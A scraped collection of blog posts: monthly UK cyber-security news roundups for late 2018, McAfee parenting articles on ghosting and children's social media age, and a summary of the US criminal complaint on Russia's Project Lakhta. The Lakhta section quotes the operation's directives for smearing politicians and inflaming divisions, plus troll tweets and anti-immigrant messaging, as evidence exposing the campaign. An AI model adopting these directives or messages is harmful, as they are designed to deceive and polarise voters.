“We have a clear process for governments to report illegal content to us, and we review all these requests against our terms of service and local law,” Facebook responded. “We are transparent about the content restrictions we make in accordance with local law in our Transparency Report.”

Vietnamese authorities requested information on suspicious accounts, but Facebook refused to hand over user data, as it would violate community standards.

El 61% de las apps transfieren datos a Facebook tengas cuenta o no

Según el informe “How Apps on Android Share Data with Facebook”, de la ONG británica Privacy International el 61% de las aplicaciones que utilizamos transfieren datos a Facebook en el momento en que un usuario abre la aplicación, tanto si el usuario tiene una cuenta o no, o si ha iniciado sesión. El estudio analizó […]

Cyber Security Roundup for December 2018

The final Cyber Security Roundup of 2018 concludes reports of major data breaches, serious software vulnerabilities and evolving cyber threats, so pretty much like the previous 11 months of the year.

5.3 millions users of "make your own avatar" app Boomoji had their accounts compromised, after the company reportedly didn't secure their internet connected databases properly. "Question and Answer" website Quora also announced the compromise of 100 million of its user accounts following a hack.


A large data breach reported in Brazil is of interest, a massive 120 million Brazilian citizens personal records were compromised due to a poorly secured Amazon S3 bucket. This is not the first mass data breach caused by an insecure S3 bucket we've seen in 2018, the lesson to be learnt in the UK, is to never assume or take cloud security for granted, its essential practice to test and audit cloud services regularly.

Amongst the amazing and intriguing space exploration successes reported by NASA in December, the space agency announced its employee's personal data may had been compromised. Lets hope poor security doesn't jeopardise the great and highly expensive work NASA are undertaking.  
NASA InSight Lander arrives on Mars 

It wouldn't be normal for Facebook not to be in the headlines for poor privacy, this time Facebook announced a Photo API bug which exposed 6.8 million user images

Away from the political circus that is Brexit, the European Parliament put into a law a new Cybersecurity Act. Because of the Brexit making all the headlines, this new law may have gone under the radar, but it certainly worth keeping an eye on, even after UK leaves the EU. The EU Parliament has agreed to increase the budget for the ENISA (Network & InfoSec) agency, which will be rebranded as the "EU Agency for Cybersecurity". The Cybersecurity Act will establish an EU wide framework for cyber-security certifications for online services and customer devices to be used within the European Economic Area, and will include IoT devices and critical infrastructure technology. Knowing the EU's love of regulations, I suspect these new best practice framework and associated accreditations to be turned into regulations further down the line, which would impact any tech business operating in European Union.

The UK Parliament enacted the "The Health and Social Care (National Data Guardian) Act", which also went under the radar due to all the Brexit political noise. The act requires the appointment of a data guardian within England and Wales. The data guardian will publish guidance on the processing of health and adult social care data for use by public bodies providing health or social care services, and produce an annual report.

Chinese telecoms giant Huawei had plenty of negative media coverage throughout December, with UK government pressuring BT into not using Huawei kit within BT's new 5G network, due to a perceived threat to UK's future critical national infrastructure posed by the Chinese stated-backed tech giant.  The UK Defence Secretary Gavin Williamson said he had "very deep concerns" about Huawei being involved in new UK mobile network.
Security company Insinia cause controversy after it took over the Twitter accounts by Eamon Holmes, Louis Theroux and several others celebs. Insinia said it had managed the account takeover by analysing the way Twitter handles messages posted by phone, to inject messages onto the targeted accounts by analysing the way the social network interacted with smartphones when messages are sent. However, Insinia were accused of being unethical and breaking the UK Computer Misuse Act in some quarters.

Unsecured internet connected printers are being hacked again, this time they were used to sent print out messages of support for Swedish YouTube star PewDiePie. A hacker named TheHackerGiraffe was said to have targeted up 50,000 printers after using Shodan to search for open printer ports online, the scan was said to have found 800,000 vulnerable printers.

An Financial Conduct Authority (FCA) report warned UK banks about their over-reliance on third-party security providers. The FCA said companies "generally lacked board members with strong familiarity or specific technical cyber-expertise. External expertise may be helpful but may also, if overly relied on, undermine the effectiveness of the ‘three lines of defence’ model in identifying and managing cyber-risks in a timely way. The report also warned about supply-chain security, especially the role that firms play in other organisations’ supply chains.

NEWS

AWARENESS, EDUCATION AND THREAT INTELLIGENCE
REPORTS

Helping Kids Deal with the Digital Rejection of ‘Ghosting’

digital rejection of ghosting

digital rejection of ghostingRejection is the unspoken risk that is present when we enter into any relationship be it a friendship or a love relationship. It’s a painful, inescapable part of life that most of us go to great lengths to avoid. That said, there’s a social media phenomenon called “ghosting” that can take the pain of rejection to surprising depths — especially among teens.

Ghosting is when a person (or friend group) you’ve been talking to online suddenly stops all communication without any explanation.

Digital Dismissal

If you’re on the receiving end of the ghosting, consider yourself ghosted. Text conversations abruptly stop. You get blocked on all social media accounts. The ghost untags him or herself in all past photos on your profiles and deletes all past comments; theirs and yours. Direct messages (if not blocked) are marked as “seen” but never get a response.

Ghosting makes it feel as if a relationship never existed, which can leave anyone — child, teen, or adult — feeling hurt, frustrated, betrayed and even traumatized.

A teen named Jess* shared her ghosting experience and described feeling “helpless, confused, and worthless,” when a person she considered a boyfriend suddenly disappeared from her life after five months and started talking to another girl online. “One minute we were close and sharing all kinds of deep stuff and then, ‘poof’! He blocked me from his social media, stopped answering my texts, and started ignoring me at school. It’s as if I never existed to him.”

Rejection = Pain

In one study, MRI images showed that the same areas of the brain become activated when we experience a social rejection as when we experience physical pain, which is why rejection can hurt so much. According to Dr. Guy Winch, rejection destabilizes our need to belong and causes us to question our self-worth. “We often respond to romantic rejections by finding fault in ourselves, bemoaning all our inadequacies, kicking ourselves when we’re already down, and smacking our self-esteem into a pulp.” Rather, he clarifies, rejection is often just a matter of being mismatched in several areas such as chemistry, goals, and commitment level.

Micro-rejection 24/7

Thanks to social media, ghosting is not only a term but a common (albeit cruel) way to end an online relationship. Because it’s digital it’s easier for some people to view others as avatars; and easier to block rather than confront. It doesn’t help that the online culture fosters micro-rejections at every turn especially for tweens and teens. With every photo that is uploaded, so too, is a young person’s bid for approval. It’s not uncommon that a child’s happiness (or lack of) is influenced by the number of likes and comments a photo racks up.

While it may be impossible to protect our kids from painful digital rejections, we can equip them to handle it when and if it comes their way. Here are a few ideas that may help ease the pain of being ghosted.

Acknowledge the hurt

digital rejection of ghostingNo doubt, being ghosted hurts and can be embarrassing for your child (or anyone for that matter) to even talk about so tread lightly if you suspect it. Listen more than you speak and empathize more than advise if you learn this is a situation your child is experiencing. Acknowledge the real pain of being cut off, dismissed, blocked, and ignored. Ghosting can happen between two people or even with a friend group. If you have a similar situation and can relate, share that experience with your child.

Help frame the situation

Tweens and teens often do not have the tools they need in their emotional toolbox to deal with confrontation. Nor are they pros at communicating. So, rather than exit a relationship properly, some kids will find it easier to disappear with a simple click or two. Help your child understand the bigger picture that not all people will act with integrity or kindness. And, not all people are meant to be your friend or romantic match, and that’s okay. There are plenty of people who will value, love, and treat them with respect.

Help set healthy standards

Being ghosted, while painful, is also an opportunity to help your son or daughter define or re-define his or her standards. Ask: What qualities and characteristics you value in a friend or love interest? What values do you need to share with another person before trusting them? What warning signs should you look for next time that a person isn’t friend material? Advise: Don’t always be the person initiating every conversation, pay attention to the quality of interactions, don’t pursue people who are unresponsive or constantly “busy.”

Discourage retribution

digital rejection of ghostingWhile some ghosting situations are mild and dismissed quickly, others can cause the person ghosted to feel humiliated, angry, and vengeful. Lashing out at or trolling a ghost online as payback isn’t the answer and will only prolong the pain of being ghosted. Encourage your child that discovering the person’s character now is a gift and that moving on with wisdom and integrity (minus conflict) is the fastest way to heal.

Help them move on

One huge pain point for people who have been ghosted is that he or she did not get any closure or insight as to why the relationship ended. To help with this, you might suggest your son or daughter write a letter to get all the feelings out — but never mail it. Need the satisfaction of posting that letter online (minus names)? There’s a site for that (warning: language).

Beware of haunting

Haunting is when a ghost tries to reconnect in small ways over time. He or she may resurface to leave a comment or periodic likes to test the re-entry climate. Some may even send a direct message trying to explain the poor behavior. While every situation is different, warn your kids against reconnecting with anyone who would ghost a relationship. Encourage your child to invest time in friends who value friendships and honor the feelings of others.

*Name changed

The post Helping Kids Deal with the Digital Rejection of ‘Ghosting’ appeared first on McAfee Blogs.

Cyber Security Roundup for November 2018

One of the largest data breaches in history was announced by Marriott Hotels at the end of November. A hack was said to have compromised up to a mind-blowing "half a Billion" hotel guests' personal information over a four year period.  See my post, Marriott Hotels 4 Year Hack Impacts Half a Billion Guests for the full details. The Radisson Hotel Group also disclosed its Rewards programme suffer a data compromise. Radisson said hackers had gained access to a database holding member's name, address, email address, and in some cases, company name, phone number, and Radisson Rewards member number.

Vision Direct reported a website compromise, which impacted users of their website between 3rd and 8th November, some 16,300 people were said to be at risk  A fake Google Analytics script was placed within its website code by hackers. 

Eurostar customers were notified by email to reset their passwords following presumably successful automated login attempts to Eurostar accounts with stolen credentials obtained by an unknown method.

Two of the TalkTalk hackers were sentenced to a grand total of 20 months for their involvement in the infamous 2015 blackmail hack, which was said to have cost TalkTalk £77 million. There may have been up to 10 other attackers involved according to the court transcripts when hackers attempted to blackmail TalkTalk’s then CEO Dido Harding into paying a ransom in Bitcoin to cover up the breach. Has the enterprise, and judiciary, learned anything from TalkTalk hack?

Uber was fined £385,000 by the UK Information Commissioner's Office, after hackers stole 2.7 million UK customers in October and November 2016. Uber attempted to cover up the breach by paying the hackers $100,000 (£78,400) to destroy the stolen customer data. Meanwhile stateside,
 Uber paid $148m to settle federal charges. 

HSBC announced it had suffered a customer data breach in between 4th and 14th of October 2018 in a suspected "credential stuffing" attack. HSBC didn't state how many customers were impacted but are known to have 38 million customers worldwide. HSBC advised their customers to regularly change and use strong passwords and to monitor their accounts for unauthorised activity, sage good practice online banking advice, but I am sure their customers will want to know what has happened.

Facebook is still making the wrong kind of privacy headlines, this time it was reported that Facebook member's private message data was found for sale online, with one instance involving 257,256 stolen profiles and including 81,208 private messages. The report appears to suggest malicious browser extensions, not Facebook, may be behind the data breach.

A report from a UK parliamentary committee warned the UK government is failing to deliver on protecting the UK's critical national infrastructure (CNI) from cyber attacks. "The threat to critical infrastructure, including the power grid, is growing" the committee reported, with some states -"especially Russia" - starting to explore ways of disrupting CNI. An advisory notice also warned that UK companies connected to CNI were being targeted by cyber attackers believed to be in eastern Europe. APT28 (Russian based FancyBear) has added the "Cannon" Downloader Tool to their arsenal, according to researchers.

Amazon's showcase Black Friday sale was hit by data breach days before it started. The online retail giant said it emailed affected customers, but refused to provide any details on the extent or nature of the breach. The customer email said “Our website inadvertently disclosed your email address or name and email address due to a technical error. The issue has been fixed. This is not a result of anything you have done, and there is no need for you to change your password or take any other action.” 

There was a far more positive security announcement by Amazon about their AWS (cloud) services, with the launch of three new services to simplify and automate AWS security configuration called AWS Control Tower, AWS Security Hub, and AWS Lake Formation McAfee released their 2019 'Cloud Adoption and Risk Report' which highlights the vital importance of configuring cloud services correctly and securely.

RiskIQ claimed that monitoring for malicious code could have stopped the recent theft of 185,000 British Airways customer records. The Magecart hacker group is believed to be responsible for injecting twenty-two lines of malicious script into the British Airway's payment page, which successfully lifted debit and credit card details, including the CVV code.

Finally, according to enSilo, European Windows users are said to be targeted by a sophisticated malware called 'DarkGate', which has an arrange of nefarious capabilities, including cryptomining, credential stealing, ransomware, and remote-access takeovers. The DarkGate malware has been found to be distributed via Torrent files disguised as popular entertainment offerings, which includes Campeones and The Walking Dead, so be careful to avoid becoming infected!

NEWS

At What Age Should Kids Join Social Media?

Last week, I waved goodbye to my eldest son as he moved halfway across the world to study for a year. I was so emotional at the airport – I couldn’t talk! After many cups of tea and even more stares in an airport café, I had no more tears left and was finally able to pull it together. I must have looked like a crazy cat!

Letting go of our kids is tough. Whether it’s their first day of school, their first sleepover, their first girlfriend or boyfriend or their first social media account – these steps towards independence can be enough to send many of us into a tailspin.

How Do We Know When Our Kids Are Ready for More Independence?

Our main job as parents is to raise our kids to be independent, law-abiding individuals who are autonomous. But every child is different with some maturing far quicker than others. So, how do we know when our kids are ready for important life milestones, particularly joining social media?

What Does the Law Say?

While there is no Australian law that dictates the minimum age kids need to be to join social media, most social media platforms require their users to be 13 years old to set up an account. This is a result of a US federal law, the Children’s Online Privacy Protection Act (COPPA), which affects any social media platform that US citizens can join. So, therefore it affects nearly all social media platforms worldwide.

What Happens in Reality?

Rightly or wrongly, many kids join social media before the age of 13. Some do this with the consent of their parents, while many don’t. In recognition of the ‘reality of the situation’, many big-time social media players, including Mark Zuckerberg, have been critical of the COPPA legislation claiming it is unrealistic. Zuckerberg even committed to trying to get it overruled – so far, no news!

And this reality hasn’t escaped the attention of the big players. Earlier this month, Instagram released a parent’s guide in which they acknowledge that ‘many younger children (under 13) use the service, often with their parents’ permission’. The parent’s guide, produced in conjunction with US internet safety group Connect Safely, also advised parents that banning social media may not be the best solution to managing their teen’s digital socialising. Instead they suggest parents should ensure the lines of communication are always open so that they can work with their kids to find appropriate ways of managing their digital lives. Pretty sound advice if you ask me, but Instagram was criticised for offering self-serving advice and encouraging youngsters to get online.

What to Do?

As the mother of four boys, I can unreservedly tell you that a ‘one size fits all’ approach does not cut it when raising kids. Every child is different. Some kids are more robust and resilient while others are more sensitive and emotional. And that’s OK. The worst thing we can do as parents is assume milestones must be met at the same time everyone else’s children do.

Just like with toilet training, sleepovers and co-ed parties, you (as the parent) are the absolute best judge of when your child is ready for these key steps. And social media is no different. Yes, there is a plethora of advice from experts and ‘experienced’ parents to consider but ultimately, it’s your call as the parent.

What To Consider When Deciding When Your Child Should Join Social Media

So, here are some things to consider when deciding if, and when your child should join social media. If your tween has already gone ahead and joined, then why not use these points to refine the current usage strategy.

1. Are They Ready?

Chances are your tween will be busting to get onto social media and will absolutely consider themselves ‘ready’! In fact, they may have already gone ahead and created their own profile without consulting you. But if they haven’t and you have a close connection with your kids, then you have a golden opportunity to assess their readiness.

You may decide that your under 13-year-old is mature enough and help them set up social media accounts and profiles. Many believe social media is an inevitable, unavoidable milestone and that it’s best to manage it proactively to avoid underground activity. You may require passwords to be shared and for posts to be approved before they are uploaded. If they have proved themselves to be trustworthy after a period of time, you may choose to be less involved.

However, if you have a child who is less mature and who tends to be anxious, you may insist they wait till 13. As we all know, it is not always pretty online. A certain level of resilience and a decent dose of perspective is essential to ride out the bumps. If there is any pushback from your tween then just talk a lot about the COPPA legislation!

2. Family Policy

If you have a tribe of kids, you may want to consider a family policy on the age your offspring can join social media. Although I am not a believer in ‘one size fits all’, I can tell you from experience that the perception of fairness in a family is very powerful. The arguments over who gets the bigger piece of cake or whose turn it is to sit in the front seat can drove you bonkers!

3. Workshop the ‘Likes Culture’ Before They Embark on their Social Media Careers

The quest to get likes online can become all encompassing, particularly when you are navigating your way through your teenage years. Before your kids join up, please have several conversations about the dangerous ‘culture of likes’ that is pervading the online world. Likes are viewed as a measure of social acceptance for many teenagers. The number of likes they do (or don’t) receive can affect their self-esteem and confidence which is very concerning. Please ensure your kids are NOT defined by the number of likes on a post and that this number is NOT reflective of their worth.

4. Set the Ground Rules

Regardless of whether your tween is about to embark on the social media journey or whether they have taken the advanced route, a family technology contract can be a great way of clarifying and formalising your expectations of both their social media usage and behaviour online. If you are looking for a good place to start, check out the contract that The Modern Parent uses. Obviously adapt it for your own situation and children’s needs, but ensure it covers key points including time spent online, sharing of personal information and what to do if a stranger tries to befriend you or if you receive online abuse.

Personally, I think 13 is a great age to kick off one’s social media career. I’m a fan of risk management and I really believe the older kids are, the better they can deal with complex online situations. But I also believe you should trust your gut as a parent. You may have a very mature 12-year-old, with a host of older siblings, who is busting to get on Instagram. Working with them to set up a profile, sharing passwords and mentoring them through their entrée to social media may be a much better option than pushing this inevitable step underground and off your radar.

So, over to you parents. This is your call! And just to inspire you a little more, let me just borrow some words from Scottish actor and father of 4 daughters, Ewan McGregor:

 ‘The thing about parenting rules is there aren’t any. That’s what makes it so difficult.’

Good luck!

Alex xx

The post At What Age Should Kids Join Social Media? appeared first on McAfee Blogs.

Cyber Security Roundup for October 2018

Aside from Brexit, Cyber Threats and Cyber Attack accusations against Russia are very much on the centre stage of UK government's international political agenda at the moment. The government publically accused Russia's military 'GRU' intelligence service of being behind four high-profile cyber-attacks, and named 12 cyber groups it said were associated with the GRU. Foreign Secretary Jeremy Hunt said, "the GRU had waged a campaign of indiscriminate and reckless cyber strikes that served no legitimate national security interest".

UK Police firmly believe the two men who carried out the Salisbury poisoning in March 2018 worked for the GRU.

The UK National Cyber Security Centre said it had assessed "with high confidence" that the GRU was "almost certainly responsible" for the cyber-attacks, and also warned UK businesses to be on the alert for indicators of compromise by the Russian APT28 hacking group.  The NCSC said GRU hackers operated under a dozen different names, including Fancy Bear (APT28), had targetted:
  • The systems database of the Montreal-based World Anti-Doping Agency (Wada), using phishing to gain passwords. Athletes' data was later published 
  • The Democratic National Committee in 2016, when emails and chats were obtained and subsequently published online. The US authorities have already linked this to Russia.
  • Ukraine's Kyiv metro and Odessa airport, Russia's central bank, and two privately-owned Russian media outlets - Fontanka.ru and news agency Interfax - in October 2017. They used ransomware to encrypt the contents of a computer and demand payment 
  • An unnamed small UK-based TV station between July and August 2015, when multiple email accounts were accessed and content stolen

Facebook was fined the maximum amount of £500,000 under pre-GDPR data protection laws by the UK Information Commissioner's Office (ICO) over the Cambridge Analytica Scandal. Facebook could face a new ICO fine after revealing hackers had accessed the contact details of 30 Million users due to a flaw with Facebook profiles. The ICO also revealed a 400% increase in reported Cyber Security Incidents and another report by a legal firm RPC said the average ICO fines had doubled, and to expect higher fines in the future. Heathrow Airport was fined £120,000 by the ICO in October after a staff member lost a USB stick last October containing "sensitive personal data", which was later found by a member of the public.

Notable Significant ICO Security Related Fines

Last month's British Airways website hack was worse than originally reported, as they disclosed a second attack which occurred on 5th September 2018, when the payment page had 22 lines of malicious Javascript code injected in an attack widely attributed to Magecart.  Another airline Cathay Pacific also disclosed it had suffered a major data breach that impacted 9.4 million customer's personal data and some credit card data.

Morrisons has lost a challenge to a High Court ruling which made it liable for a data breach, after an employee, since jailed for 8 years, stole and posted thousands of its employees' details online in 2014.  Morrisons said it would now appeal to the Supreme Court., if that appeal fails, those affected will be able to claim compensation for "upset and distress". 

Interesting article on Bloomberg on "How China Used a Tiny Chip to Infiltrate U.S. Companies". However, there was a counter-narrative to the Bloomberg article on Sky News. But didn't stop Ex-Security Minister Admiral Lord West calling the Chinese when he said Chinese IT Kit 'is putting all of us at risk' if used in 5G.  He raises a valid point, given the US Commerce Department said it would restrict the export of software and technology goods from American firms to Chinese chipmaker Fujian Jinhua BT, which uses Huawei to supply parts for its network, told Sky News that it would "apply the same stringent security measures and controls to 5G when we start to roll it out, in line with continued guidance from government". Recently there have been warnings issued by the MoD and NCSC stating a Chinese espionage group known as APT10 are attacking IT suppliers to target military and intelligence information.

NCSC is seeking feedback on the latest drafts 'knowledge areas' on CyBOK, a Cyber Security body of knowledge which it is supporting along with academics and the general security industry.

Google are finally pulling the plug on Google+, after user personal data was left exposed. Google and the other three major web browser providers in the world said, in what seems like coordinated announcements, businesses must accept TLS Version 1.0 and 1.1 will no longer support after Q1 2018.

So its time to move over to the more secure TLS V1.2 or the more secure & efficient TLS V1.3.

NEWS

Project Lakhta: Putin’s Chef spends $35M on social media influence

Project Lakhta is the name of a Russian project that was further documented by the Department of Justice last Friday in the form of sharing a Criminal Complaint against Elena Alekseevna Khusyaynova, said to be the accountant in charge of running a massive organization designed to inject distrust and division into the American elections and American society in general.

https://www.justice.gov/opa/press-release/file/1102316/download
In a fairly unusual step, the 39 page Criminal Complaint against Khusyaynova, filed just last month in Alexandria, Virginia, has already been unsealed, prior to any indictment or specific criminal charges being brought against her before a grand jury.  US Attorney G. Zachary Terwilliger says "The strategic goal of this alleged conspiracy, which continues to this day, is to sow discord in the U.S. political system and to undermine faith in our democratic institutions."

The data shared below, intended to summarize the 39 page criminal complaint, contains many direct quotes from the document, which has been shared by the DOJ. ( Click for full Criminal Complaint against Elena Khusyaynova )

Since May 2014 the complaint shows that the following organizations were used as cover to spread distrust towards candidates for political office and the political system in general.

Internet Research Agency LLC ("IRA")
Internet Research LLC
MediaSintez LLC
GlavSet LLC
MixInfo LLC
Azimut LLC
NovInfo LLC
Nevskiy News LLC ("NevNov")
Economy Today LLC
National News LLC
Federal News Agency LLC ("FAN")
International News Agency LLC ("MAN")

These entities employed hundreds of individuals in support of Project Lakhta's operations with an annual global budget of millions of US dollars.  Only some of their activity was directed at the United States.

Prigozhin and Concord 

Concord Management and Consulting LLC and Concord Catering (collectively referred to as "Concord") are related Russian entities with various Russian government contracts.  Concord was the primary source of funding for Project Lakhta, controlling funding, recommending personnel, and overseeing activities through reporting and interaction with the management of various Project Lakhta entities.

Yevgeniy Viktorovich Prigozhin is a Russian oligarch closely identified with Russian President Vladimir Putin.  He began his career in the food and restaurant business and is sometimes referred to as "Putin's Chef."  Concord has Russian government contracts to feed school children and the military.

Prigozhin was previously indicted, along with twelve others and three Russian companies, with committing federal crimes while seeking to interfere with the US elections and political process, including the 2016 presidential election.

Project Lakhta internally referred to their work as "information warfare against the United States of America" which was conducted through fictitious US personas on social media platforms and other Internet-based media.

Lakhta has a management group which organized the project into departments, including a design and graphics department, an analysts department, a search-engine optimization ("SEO") department, an IT department and a finance department.

Khusyaynova has been the chief accountant of Project Lakhta's finance department since April of 2014, which included the budgets of most or all of the previously named organizations.  She submitted hundreds of financial vouchers, budgets, and payments requests for the Project Lakhta entities.  The money was managed through at least 14 bank accounts belonging to more Project Lakhta affiliates, including:

Glavnaya Liniya LLC
Merkuriy LLC
Obshchepit LLC
Potentsial LLC
RSP LLC
ASP LLC
MTTs LLC
Kompleksservis LLC
SPb Kulinariya LLC
Almira LLC
Pishchevik LLC
Galant LLC
Rayteks LLC
Standart LLC

Project Lakhta Spending 

Monthly reports were provided by Khusyaynova to Concord about the spendings for at least the period from January 2016 through July 2018.

A document sent in January 2017 including the projected budget for February 2017 (60 million rubles, or roughly $1 million USD), and an accounting of spending for all of calendar 2016 (720 million rubles, or $12 million USD).  Expenses included:

Registration of domain names
Purchasing proxy servers
Social media marketing expenses, including:
 - purchasing posts for social networks
 - advertisements on Facebook
 - advertisements on VKontakte
 - advertisements on Instagram
 - promoting posts on social networks

Other expenses were for Activists, Bloggers, and people who "developed accounts" on Twitter to promote online videos.

In January 2018, the "annual report" for 2017 showed 733 million Russian rubles of expenditure ($12.2M USD).

More recent expenses, between January 2018 and June 2018, included more than $60,000 in Facebook ads, and $6,000 in Instagram ads, as well as $18,000 for Bloggers and Twitter account developers.

Project Lakhta Messaging

From December 2016 through May 2018, Lakhta analysts and activist spread messages "to inflame passions on a wide variety of topics" including:
  • immigration
  • gun control and the Second Amendment 
  • the Confederate flag
  • race relations
  • LGBT issues 
  • the Women's March 
  • and the NFL national anthem debate.


Events in the United States were seized upon "to anchor their themes" including the Charleston church shootings, the Las Vegas concert shootings, the Charlottesville "Unite the Right" rally, police shootings of African-American men, and the personnel and policy decisions of the Trump administration.

Many of the graphics that were shared will be immediately recognizable to most social media users.

"Rachell Edison" Facebook profile
The graphic above was shared by a confirmed member of the conspiracy on December 5, 2016. "Rachell Edison" was a Facebook profile controlled by someone on payroll from Project Lakhta.  Their comment read  "Whatever happens, blacks are innocent. Whatever happens, it's all guns and cops. Whatever happens, it's all racists and homophobes. Mainstream Media..."

The Rachell Edison account was created in September 2016 and controlled the Facebook page "Defend the 2nd".  Between December 2016 and May 2017, "while concealing its true identity, location, and purpose" this account was used to share over 700 inflammatory posts related to gun control and the Second Amendment.

Other accounts specialized on other themes.  Another account, using the name "Bertha Malone", was created in June 2015, using fake information to claim that the account holder lived in New York City and attended a university in NYC.   In January 2016, the account created a Facebook page called "Stop All Invaders" (StopAI) which shared over 400 hateful anti-immigration and anti-Islam memes, implying that all immigrants were either terrorists or criminals.  Posts shared by this acount reached 1.3 million individuals and at least 130,851 people directly engaged with the content (for example, by liking, sharing, or commenting on materials that originated from this account.)

Some examples of the hateful posts shared by "Bertha Malone" that were included in the DOJ criminal complaint,  included these:




The latter image was accompanied by the comment:

"Instead this stupid witch hunt on Trump, media should investigate this traitor and his plane to Islamize our country. If you are true enemy of America, take a good look at Barack Hussein Obama and Muslim government officials appointed by him."

Directions to Project Lakhta Team Members


The directions shared to the propaganda spreaders gave very specific examples of how to influence American thought with guidance on what sources and techniques should be used to influence particular portions of our society.  For example, to further drive wedges in the Republican party, Republicans who spoke out against Trump were attacked in social media:
(all of these are marked in the Criminal Complaint as "preliminary translations of Russian text"):

"Brand McCain as an old geezer who has lost it and who long ago belonged in a home for the elderly. Emphasize that John McCain's pathological hatred towards Donald Trump and towards all his initiatives crosses all reasonable borders and limits.  State that dishonorable scoundrels, such as McCain, immediately aim to destroy all the conservative voters' hopes as soon as Trump tries to fulfill his election promises and tries to protect the American interests."

"Brand Paul Ryan a complete and absolute nobody incapable of any decisiveness.  Emphasize that while serving as Speaker, this two-faced loudmouth has not accomplished anything good for America or for American citizens.  State that the only way to get rid of Ryan from Congress, provided he wins in the 2018 primaries, is to vote in favor of Randy Brice, an American veteran and an iron worker and a Democrat."

Frequently the guidance was in relation to a particular news headline, where directions on how to use the headline to spread their message of division where shared. A couple examples of these:

After a news story "Trump: No Welfare To Migrants for Grants for First 5 Years" was shared, the conspiracy was directed to twist the messaging like this:

"Fully support Donald Trump and express the hope that this time around Congress will be forced to act as the president says it should. Emphasize that if Congress continues to act like the Colonial British government did before the War of Independence, this will call for another revolution.  Summarize that Trump once again proved that he stands for protecting the interests of the United States of America."

In response to an article about scandals in the Robert Mueller investigation, the direction was to use this messaging:

"Special prosecutor Mueller is a puppet of the establishment. List scandals that took place when Mueller headed the FBI.  Direct attention to the listed examples. State the following: It is a fact that the Special Prosector who leads the investigation against Trump represents the establishment: a politician with proven connections to the U.S. Democratic Party who says things that should either remove him from his position or disband the entire investigation commission. Summarize with a statement that Mueller is a very dependent and highly politicized figure; therefore, there will be no honest and open results from his investigation. Emphasize that the work of this commission is damaging to the country and is aimed to declare impeachement of Trump. Emphasize that it cannot be allowed, no matter what."

Many more examples are given, some targeted at particular concepts, such as this direction regarding "Sanctuary Cities":

"Characterize the position of the Californian sanctuary cities along with the position of the entire California administration as absolutely and completely treacherous and disgusting. Stress that protecting an illegal rapist who raped an American child is the peak of wickedness and hypocrisy. Summarize in a statement that "sanctuary city" politicians should surrender their American citizenship, for they behave as true enemies of the United States of America"

Some more basic guidance shared by Project Lakhta was about how to target conservatives vs. liberals, such as "if you write posts in a liberal group, you must not use Breitbart titles.  On the contrary, if you write posts in a conservative group, do not use Washington Post or BuzzFeed's titles."

We see the "headline theft" implied by this in some of their memes.  For example, this Breitbart headline:


Became this Project Lakhta meme (shared by Stop All Immigrants):


Similarly this meme originally shared as a quote from the Heritage Foundation, was adopted and rebranded by Lakhta-funded "Stop All Immigrants": 



Twitter Messaging and Specific Political Races

Many Twitter accounts shown to be controlled by paid members of the conspiracy were making very specific posts in support of or in opposition to particular candidates for Congress or Senate.  Some examples listed in the Criminal Complaint include:

@CovfefeNationUS posting:

Tell us who you want to defeat!  Donate $1.00 to defeat @daveloebsack Donate $2.00 to defeat @SenatorBaldwin Donate $3.00 to defeat @clairecmc Donate $4.00 to defeat @NancyPelosi Donate $5.00 to defeat @RepMaxineWaters Donate $6.00 to defeat @SenWarren

Several of the Project Lakhta Twitter accounts got involved in the Alabama Senate race, but to point out that the objective of Lakhta is CREATE DISSENT AND DISTRUST, they actually tweeted on opposite sides of the campaign:

One Project Lakhta Twitter account, @KaniJJackson, posted on December 12, 2017: 

"Dear Alabama, You have a choice today. Doug Jones put the KKK in prison for murdering 4 young black girls.  Roy Moore wants to sleep with your teenage daughters. This isn't hard. #AlabamaSenate"

while on the same day @JohnCopper16, also a confirmed Project Lakhta Twitter account, tweeted:

"People living in Alabama have different values than people living in NYC. They will vote for someone who represents them, for someone who they can trust. Not you.  Dear Alabama, vote for Roy Moore."

@KaniJJackson was a very active voice for Lakhta.  Here are some additional tweets for that account:

"If Trump fires Robert Mueller, we have to take to the streets in protest.  Our democracy is at stake." (December 16, 2017)

"Who ended DACA? Who put off funding CHIP for 4 months? Who rejected a deal to restore DACA? It's not #SchumerShutdown. It's #GOPShutdown." (January 19, 2018)

@JohnCopper16 also tweeted on that topic: 
"Anyone who believes that President Trump is responsible for #shutdown2018 is either an outright liar or horribly ignorant. #SchumerShutdown for illegals. #DemocratShutdown #DemocratLosers #DemocratsDefundMilitary #AlternativeFacts"   (January 20, 2018)

@KaniJJackson on Parkland, Florida and the 2018 Midterm election: 
"Reminder: the same GOP that is offering thoughts and prayers today are the same ones that voted to allow loosening gun laws for the mentally ill last February.  If you're outraged today, VOTE THEM OUT IN 2018. #guncontrol #Parkland"

They even tweet about themselves, as shown in this pair of tweets!

@JemiSHaaaZzz (February 16, 2018):
"Dear @realDonaldTrump: The DOJ indicted 13 Russian nationals at the Internet Research Agency for violating federal criminal law to help your campaign and hurt other campaigns. Still think this Russia thing is a hoax and a witch hunt? Because a lot of witches just got indicted."

@JohnCopper16 (February 16, 2018): 
"Russians indicted today: 13  Illegal immigrants crossing Mexican border indicted today: 0  Anyway, I hope all those Internet Research Agency f*ckers will be sent to gitmo." 

The Russians are also involved in "getting out the vote" - especially of those who hold strongly divisive views:

@JohnCopper16 (February 27, 2018):
"Dem2018 platform - We want women raped by the jihadists - We want children killed - We want higher gas prices - We want more illegal aliens - We want more Mexican drugs And they are wondering why @realDonaldTrump became the President"

@KaniJJackson (February 19, 2018): 
"Midterms are 261 days, use this time to: - Promote your candidate on social media - Volunteer for a campaign - Donate to a campaign - Register to vote - Help others register to vote - Spread the word We have only 261 days to guarantee survival of democracy. Get to work! 

More recent tweets have been on a wide variety of topics, with other accounts expressing strong views around racial tensions, and then speaking to the Midterm elections: 

@wokeluisa (another confirmed Project Lakhta account): 
"Just a reminder that: - Majority black Flint, Michigan still has drinking water that will give you brain damage if consumed - Republicans are still trying to keep black people from voting - A terrorist has been targeting black families for assassination in Austin, Texas" 

and then, also @wokeluisa: (March 19, 2018): 
"Make sure to pre-register to vote if you are 16 y.o. or older. Don't just sit back, do something about everything that's going on because November 6, 2018 is the date that 33 senate seats, 436 seats in the House of Representatives and 36 governorships will be up for re-election." 

And from @johncopper16 (March 22, 2018):
"Just a friendly reminder to get involved in the 2018 Midterms. They are motivated They hate you They hate your morals They hate your 1A and 2A rights They hate the Police They hate the Military They hate YOUR President" 

Some of the many additional Twitter accounts controlled by the conspiracy mentioned in the Criminal Complaint: 

